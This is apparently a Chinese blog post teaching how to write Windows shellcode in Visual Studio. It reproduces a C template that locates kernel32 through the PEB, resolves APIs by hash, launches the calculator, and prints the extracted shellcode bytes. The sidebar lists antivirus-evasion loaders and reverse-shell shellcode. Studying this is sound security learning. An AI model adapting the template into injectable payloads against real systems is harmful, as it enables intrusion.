编写shellcode(vs2017)

最新推荐文章于 2024-02-12 11:05:27 发布
最新推荐文章于 2024-02-12 11:05:27 发布
阅读量2.6k 收藏 3
点赞数 1
分类专栏: shellcode 文章标签: shellcode

代码大概明白,细节处有待吸收。
注意:关闭GS,关闭DEP,优化/O1
引用

//-------------------------------------------------------------------------
// Shellcode Template in C
//
// Compile with VC 6:
// C:\CSC> cl.exe -MD -O1 Shellcode.c
// 
// tombkeeper@gmail.com
// 2008.05
//-------------------------------------------------------------------------

#include  <winsock2.h>
#include  <windows.h>
#include  <stdlib.h>
#include  <stdio.h>
#include  <fcntl.h>
#pragma comment( lib, "Kernel32.lib" )

//#pragma comment( linker,"/ENTRY:main" )
#pragma comment( linker, "/ALIGN:4096" )
#pragma data_seg( ".text" )
#pragma const_seg( ".text" )

typedef  void * ( __stdcall * WinAPIPtr )();
typedef  void * ( __cdecl * CFuncPtr )();
//-------------------------------------------------------------------------
#define HASH_WinExec                    0x25e6b913
#define HASH_ExitProcess                0xcbff6bb9
struct KERNEL32
{
    PVOID BaseAddr;
    WinAPIPtr WinExec;
    WinAPIPtr ExitProcess;
};

void* GetProcAddrByHash( PVOID LibBaseAddr, DWORD FnHash );
PVOID GetKernel32Base(void);

//-------------------------------------------------------------------------
//void __declspec(naked) StartSign (){}
//-------------------------------------------------------------------------

void ShellCode(void)
{
    struct  KERNEL32    Kernel32;
    DWORD   sz_String[] = { 0x636c6163, 0x00000000 };

    Kernel32.BaseAddr = GetKernel32Base();

    Kernel32.ExitProcess = GetProcAddrByHash( Kernel32.BaseAddr, HASH_ExitProcess);
    Kernel32.WinExec = GetProcAddrByHash( Kernel32.BaseAddr, HASH_WinExec);

    Kernel32.WinExec( sz_String, SW_SHOWNORMAL );
    //Kernel32.ExitProcess(0);
}

//-------------------------------------------------------------------------
#pragma pack(8)

struct _ACTIVATION_CONTEXT;

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING;

typedef struct _LDR_DATA_TABLE_ENTRY {
    LIST_ENTRY InLoadOrderLinks;
    LIST_ENTRY InMemoryOrderLinks;
    LIST_ENTRY InInitializationOrderLinks;
    PVOID DllBase;
    PVOID EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;
    ULONG Flags;
    USHORT LoadCount;
    USHORT TlsIndex;
    union {
        LIST_ENTRY HashLinks;
        struct {
            PVOID SectionPointer;
            ULONG CheckSum;
        };
    };
    union {
        struct {
            ULONG TimeDateStamp;
        };
        struct {
            PVOID LoadedImports;
        };
    };
    struct _ACTIVATION_CONTEXT * EntryPointActivationContext;

    PVOID PatchInformation;

} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

typedef struct EB_LDR_DATA {
    ULONG Length;
    BOOLEAN Initialized;
    HANDLE SsHandle;
    LIST_ENTRY InLoadOrderModuleList;
    LIST_ENTRY InMemoryOrderModuleList;
    LIST_ENTRY InInitializationOrderModuleList;
    PVOID EntryInProgress;
} PEB_LDR_DATA, *PPEB_LDR_DATA;

typedef struct EB_HEAD {
    BOOLEAN InheritedAddressSpace;
    BOOLEAN ReadImageFileExecOptions;
    BOOLEAN BeingDebugged;
    union {
        BOOLEAN BitField;
        struct {
            BOOLEAN ImageUsesLargePages : 1;
            BOOLEAN SpareBits : 7;
         };
    };
    HANDLE Mutant;
    PVOID  ImageBaseAddress;
    PPEB_LDR_DATA Ldr;
} PEB_HEAD, * PPEB_HEAD;

//-------------------------------------------------------------------------
__forceinline DWORD GetCurrentTeb(void)
{
    __asm mov eax, fs:[0x18]
}

__forceinline DWORD GetCurrentPeb(void)
{
    return *(DWORD*)( GetCurrentTeb()+0x30 );
}

PVOID GetKernel32Base(void)
{
    PPEB_HEAD pPEB = (PPEB_HEAD)GetCurrentPeb();
    PLIST_ENTRY pListHead = pPEB->Ldr->InInitializationOrderModuleList.Flink;
    PLDR_DATA_TABLE_ENTRY pLDR_DATA_TABLE_ENTRY;
    int i;
    for( i = 0; i < 2; i++ )
    {
        pLDR_DATA_TABLE_ENTRY = CONTAINING_RECORD ( 
            pListHead->Flink, LDR_DATA_TABLE_ENTRY, InInitializationOrderLinks
        );
        if( pLDR_DATA_TABLE_ENTRY->BaseDllName.Buffer[8] == 0x002E ) break;
        pListHead = pListHead->Flink;
    }
    return pLDR_DATA_TABLE_ENTRY->DllBase;
}

//-------------------------------------------------------------------------
__forceinline DWORD HashKey(char *key)
{
    DWORD nHash = 0;
    while (*key)
    {
        nHash = (nHash<<5) + nHash + *key++;
    }
    return nHash;
}

void* GetProcAddrByHash( PVOID LibBaseAddr, DWORD FnHash )
{
    DWORD *pNameBase;
    void* Function;
    int Ordinals;
    PIMAGE_DOS_HEADER pDos;
    PIMAGE_NT_HEADERS pNT;
    PIMAGE_EXPORT_DIRECTORY pExport;
    BOOL Found = FALSE;

    pDos = ( PIMAGE_DOS_HEADER )LibBaseAddr;
    pNT = ( PIMAGE_NT_HEADERS )( (DWORD)LibBaseAddr+(DWORD)pDos->e_lfanew );
    pExport=( PIMAGE_EXPORT_DIRECTORY )( (DWORD)LibBaseAddr+pNT->OptionalHeader.DataDirectory[0].VirtualAddress );
    pNameBase=( DWORD* )( (DWORD)LibBaseAddr+pExport->AddressOfNames );
    for (Ordinals = 0; Ordinals < pExport->NumberOfNames; Ordinals++)
    {
        char *pName=(char*)LibBaseAddr+*pNameBase;
        if( HashKey(pName) == FnHash )
        {
            Found = TRUE;
            break;
        }
        pNameBase++;
    }
    if( Found )
    {
        WORD Index;
        Index = ( (WORD*)( (DWORD)LibBaseAddr+pExport->AddressOfNameOrdinals) )[Ordinals];
        Function = (void *)( (DWORD)LibBaseAddr+((DWORD*)((DWORD)LibBaseAddr+pExport->AddressOfFunctions))[Index] );
        return Function;
    }
    return NULL;
}

//-------------------------------------------------------------------------
void __declspec(naked) EndSign (){}
//-------------------------------------------------------------------------

void ShellCodeToHex
(
    BYTE *ShellCode,
    DWORD ShellCodeSize,
    FILE *stream
)
{
    char Head[] = "BYTE ShellCode[] = {";
    char Tail[] = "};\n";
    int i;

    fprintf( stream, Head );
    for( i=0; i<ShellCodeSize; i++ )
    {
        if ( (i%16)==0 )   // 16 bytes per line
        {
            fprintf( stream, "%s    ", "\n" );
        }
        if ( i != (ShellCodeSize-1) )
        {
            fprintf( stream, "0x%.2X,", ShellCode[i] );
        }
        else
        {
            fprintf( stream, "0x%.2X", ShellCode[i] );
            fprintf( stream, "%s", "\n" );
        }
    }
    fprintf( stream, Tail );
    fprintf( stream, "DWORD ShellCodeSize = %d;\n", ShellCodeSize );
}

//void main(void)
//{
//    DWORD ShellCodeSize;
//
//    ShellCodeSize = (DWORD)EndSign - (DWORD)StartSign;
//    ShellCodeToHex ( (BYTE *)ShellCode, ShellCodeSize, stdout );
//    // ShellCode();
//}
void main(void)
{
    DWORD ShellCodeSize;
    ShellCodeSize = (DWORD)EndSign - (DWORD)ShellCode;
    ShellCodeToHex((BYTE *)ShellCode, ShellCodeSize, stdout);
    system("pause");
    ShellCode();
}

这里写图片描述

BYTE ShellCode[] = {
    0x55,0x8B,0xEC,0x51,0x51,0x33,0xC9,0xC7,0x45,0xF8,0x63,0x61,0x6C,0x63,0x56,0x89,
    0x4D,0xFC,0x64,0xA1,0x18,0x00,0x00,0x00,0x8B,0x40,0x30,0x8B,0x40,0x0C,0x8B,0x70,
    0x1C,0x8B,0x36,0x8B,0x46,0x20,0x66,0x83,0x78,0x10,0x2E,0x74,0x06,0x41,0x83,0xF9,
    0x02,0x7C,0xEE,0x8B,0x4E,0x08,0x8D,0x45,0xF8,0x6A,0x01,0x50,0xBA,0x13,0xB9,0xE6,
    0x25,0xE8,0x07,0x00,0x00,0x00,0xFF,0xD0,0x5E,0x8B,0xE5,0x5D,0xC3,0x55,0x8B,0xEC,
    0x83,0xEC,0x10,0x53,0x56,0x8B,0xF1,0x89,0x55,0xF0,0x33,0xD2,0x57,0x8B,0x46,0x3C,
    0x8B,0x5C,0x30,0x78,0x03,0xDE,0x89,0x5D,0xF4,0x8B,0x4B,0x20,0x03,0xCE,0x39,0x53,
    0x18,0x76,0x39,0x8B,0x39,0x33,0xC0,0x03,0xFE,0x8A,0x1F,0x84,0xDB,0x8B,0x5D,0xF4,
    0x74,0x1C,0x8B,0xD8,0x8A,0x07,0x6B,0xDB,0x21,0x0F,0xBE,0xC0,0x03,0xD8,0x47,0x8A,
    0x07,0x84,0xC0,0x75,0xF1,0x89,0x5D,0xF8,0x8B,0x5D,0xF4,0x8B,0x45,0xF8,0x3B,0x45,
    0xF0,0x74,0x12,0x83,0xC1,0x04,0x42,0x3B,0x53,0x18,0x72,0xC7,0x33,0xC0,0x5F,0x5E,
    0x5B,0x8B,0xE5,0x5D,0xC3,0x8B,0x43,0x24,0x8D,0x04,0x50,0x0F,0xB7,0x0C,0x30,0x8B,
    0x43,0x1C,0x8D,0x04,0x88,0x8B,0x04,0x30,0x03,0xC6,0xEB,0xE2
};

运行shellcode方式有很多种,

我是用远程线程创建的,

恩,可以参考这个

运行效果弹出计算器,

唉,本来想写call的,

怎么越跑越偏。

osummertime
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
NimShellCodeLoader:使用nim编写shellcode加载器
02-03
NimShellCodeLoader Nim编写Windows平台shellcode免杀加载器 快速生成免杀毒性文件 更新: 20210123:增加三种加载shellcode方式,其中两种使用了库,需要安装该库才能正常编译 特点: 1:自带通常加载方式 2:可自行拓展加载方式 3:支持两种加密技术,分别位3des加密和凯撒密码,密钥随机,每次生成文件拥有不同的哈希 完全针对技术研究和获得正式授权的测试活动。 ##文件组成: bin中存放生成的重组文件 encryption存储加密代码文件 module中存放c ++功能文件 安装: 1,安装nim最新版 2,下载本项目,分别编译encryption中的Tdea.nim和Caesar.nim 。 nim c -d:release --opt:size Tdea.nim nim c -d:release --opt:size Caesar.nim 3,编译c#项目,将初始化文件放到当前目录 使用方法: 1,打开生成器 2,将有效载荷到该窗口 3,选择加载方式,点击生成,还原文件会保存到bin文件夹中 拓展: 1,新建ni
Delphi编写本地溢出反向连接通用ShellCode
01-13
{ SinDoor One By Anskya Email:[email protected] Web:Www.Anskya.Net QQ:115447 说明:打开NC监听本地8848端口~运行程序返回一个Shell,本程序ShellCode:是通用ShellCode..内部镶有API搜索引擎和数据代码融合(很简单的技术,病毒和ShellCode都用得到),有兴趣大家自己用Debug跟一下我就不对说了... 感谢zhengxi's Crc32函数,Vecna API函数搜索引擎和29A的病毒杂志,还有pker的~API搜索引擎范例。--我没有使用ShellCode变型都是原始代码。 为了偷懒就把以前写的System.pas直接拿来用了,System.pas中包含的API搜索引擎在这里没有使用,紧紧是为了引用ExitProcess函数而已. ShellCode部分可以在VC下编写然后提取 ( 小弟是用TASM直接编写用16进制编辑器直接提取.. 关于ShellCode的提取参考可以参考..《C语言直接编写ShellCode》或者就用VC边写边翻译吧。^_^·力气活 ) 本程序仅仅为了演示~Delphi编写ShellCode的示例并没有其他意图}翻译《缓冲区溢出教程》时候的一个小例子。现在身体不行了·也不能写了,索性整理一下发布好了~~大家看一下就知道了,仅仅是个例子.
Android系统shellcode编写.zip_android_shellcode
09-23
Android手机的普及,Android系统安全日益受人关注。漏洞攻防是安全的一大课题,其中自然少不了shellcode编写
【Rust】使用Rust实现一个简单的shell
数字人生
02-12 1471
在创建一个能和成熟shell(如bash或zsh)竞争的程序方面还有很长的路要走,但这个基本版本足够用于理解如何在Rust中开始这类型的项目。:Rust拥有一个完善的工具链和生态系统,包括包管理器Cargo、文档生成器rustdoc、构建工具rustc等。:Rust内置了对并发编程的支持,通过其独特的所有权系统和借用检查器来防止数据竞争和其他并发问题。制作一个简单的shell是一项很好的学习项目,尤其是当涉及到Unix系统编程和Rust的系统级能力时。以下是一个使用Rust实现的简单shell的基础框架。
EvilWMIProvider:安装并执行Shellcode
05-19
EvilWMI提供者 安装并执行Shellcode 在Windows 7 x64 SP1上测试 反馈欢迎
最短shellcode提取方法和测试【原创】
12-13
这是一个windows弹出对话框的shellcode,38个字节 在windows xp sp3下测试 已在vc++6,mingw,cygwin下编译测试
编写并提取简易 ShellCode
weixin_30790841的博客
08-26 209
ShellCode 通常是指一个原始的可执行代码的有效载荷,ShellCode 这个名字来源于攻击者通常会使用这段代码来获得被攻陷系统上的交互 Shell 的访问权限,而现在通常用于描述一段自包含的独立的可执行代码片段。 ShellCode 通常会与漏洞利用并肩使用,或是被恶意代码用于执行进程代码的注入,漏洞利用等,通常情况下 ShellCode 代码无法独立运行,必须依赖于父进程或是 ...
VScode shell脚本编程
qq_39612333的博客
02-15 2099
vscode shell脚本编程插件
VC 写shellcode 时函数地址去掉跳转表
把梦想放飞在蓝色的天空里...
11-07 514
在默认DEBUG/RELEASE模式下函数地址不是最终的函数地址,而是E9 + offset 的形式,这使得直接使用函数地址作为shellcode 起始地址时会出现问题。该怎么修改编译选项呢? 在项目属性中,选择 “配置属性” ==> "C/C++" ==> "优化" ==> "全程序优化" ,选择“是(/GL)” 这样就去掉了函数跳转表。但是这个开关会和另一个开关有冲突: ...
VsCode编辑器之shell脚本的编辑
小黄瓜要编程的博客
06-05 5330
长期从事.Net开发,一直使用宇宙第一IDE Visual studio系列,VsCode的横空出世,让我又多了一个非常完美的选择,vscode从Python,前端,Golong,MarkDown,shell,qt,c#都有非常完美的插件支持,真的让人爱不释手。本系列将介绍用vscode开发和编辑的常用配置和插件。 环境介绍 操作系统:Win10 VsCode版本:1.46.0由于Windows和Linux的系统换行的区别,win是\n\r,而Linux是\n,没有回车符号,所以,Windows环境下编写
vscode运行shell脚本的详细配置
w12345jl的博客
10-15 2743
shellformat.path”: “D:/Program Files/shfmt/shfmt_v3.6.0_windows_amd64.exe”(根据自己的存放路径,并注意路径中斜杠方向)进入Settings,输入"Code-runner:Run in Terminal",勾选"Whether to run code in Integrated Terminal."​ 进入Settings,输入"shell-format",点击"Edit in settings json"
VS2010中编写x64汇编的具体方法.docx
12-30
编写涉及系统特性的一些底层程序,特别是ShellCode,不可避免地要采用直接编写汇编代码的方式。 在目标平台为x86模式时,可以直接使用内联汇编,这个很多人都比较熟悉了,也非常地方便。 但是当目标平台为x64时,微软不再允许直接内联汇编了,这给我们编程造成了一些不便。 怎么解决这个问题呢? 一种办法是改用Intel的编译器,它仍然支持内联汇编。 另一种办法还是用VS了,但是不能内联,需要把汇编部分单独写到一个asm文件里,然后在其它源文件中引用。
Delphi编写ShellCode的示例
02-22
Delphi编写ShellCode的示例+Delphi代码
用C++撰写shellcode.zip
10-06
非常不错的shellcode学习教程,非常完善,分享给大家。仅供学习使用,切不可商业用途,后果自负。
Study_shellcode:windows平台下功能性shellcode编写
04-29
windows平台下功能性shellcode编写 包含了5个类型的test例子,不知道从哪里下载的。 例子可能比较老,在win7,win10上可能无法成功执行,新系统的安全性比较高,最佳的环境是在XP。 补充以下不错的入门教程 ...
2010考研管理类联考综合能力答案解析.pdf
04-24
考研管理类联考综合能力答案解析,考研真题,考研历年真题,考研管理类联考历年真题,真题解析。
NumPy Matplotlib Matplotlib 是 Python 的绘图库 .zip
04-24
matplotlib绘图 通过 Matplotlib,开发者可以仅需要几行代码,便可以生成绘图、直方图、功率谱、条形图、错误图、散点图等。 Matplotlib基础知识 1.Matplotlib中的基本图表包括的元素 x轴和y轴 水平和垂直的轴线 x轴和y轴刻度 刻度标示坐标轴的分隔,包括最小刻度和最大刻度 x轴和y轴刻度标签 表示特定坐标轴的值 绘图区域 实际绘图的区域 2.hold属性 hold属性默认为True,允许在一幅图中绘制多个曲线;将hold属性修改为False,每一个plot都会覆盖前面的plot。 但是不推荐去动hold这个属性,这种做法(会有警告)。因此使用默认设置即可。 3.网格线 grid方法 使用grid方法为图添加网格线 设置grid参数(参数与plot函数相同) .lw代表linewidth,线的粗细 .alpha表示线的明暗程度 4.axis方法 如果axis方法没有任何参数,则返回当前坐标轴的上下限 5.xlim方法和ylim方法 除了plt.axis方法,还可以通过xlim,ylim方法设置坐标轴范围
毕业设计:基于微信小程序大学校园二手教材与书籍拍卖系统(源码 + 数据库 + 说明文档)
04-24
毕业设计:基于微信小程序大学校园二手教材与书籍拍卖系统(源码 + 数据库 + 说明文档) 毕业设计:基于微信小程序大学校园二手教材与书籍拍卖系统(源码 + 数据库 + 说明文档) 第二章 需求分析 4 2.1可行性分析 4 2.1.1技术的可行性 4 2.1.2经济的可行性 4 2.1.3操作可行性 4 2.2需求调研 4 第三章 数据库设计 6 3.1数据库的分析与设计 6 3.1.1数据库的概念结构设计 6 3.1.2数据表的逻辑结构设计 7 第四章 系统功能实现 8 4.1 系统后台界面 8 4.2书籍类别管理 8 4.3 书籍信息界面 9 4.4竞拍管理界面 9 4.5 微信小程序首页 9 4.6书籍信息添加 10 4.7书籍竞拍界面 11 4.8用户后台界面 11 第五章 系统测试 12 5.1 系统测试的意义 12 5.2 系统测试的内容 12 5.3系统测试结果 12 总结 13
利用openCV控制单片机小车运动轨迹.zip
最新发布
04-24
利用openCV控制单片机小车运动轨迹.zip
如何编写shellcode
05-20
编写shellcode通常需要了解汇编语言和计算机系统的底层知识。以下是一个简单的示例,可以作为起点: ``` section .text global _start _start: xor eax, eax ; 把 EAX 寄存器清零 push eax ; 把 0 压入栈中 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值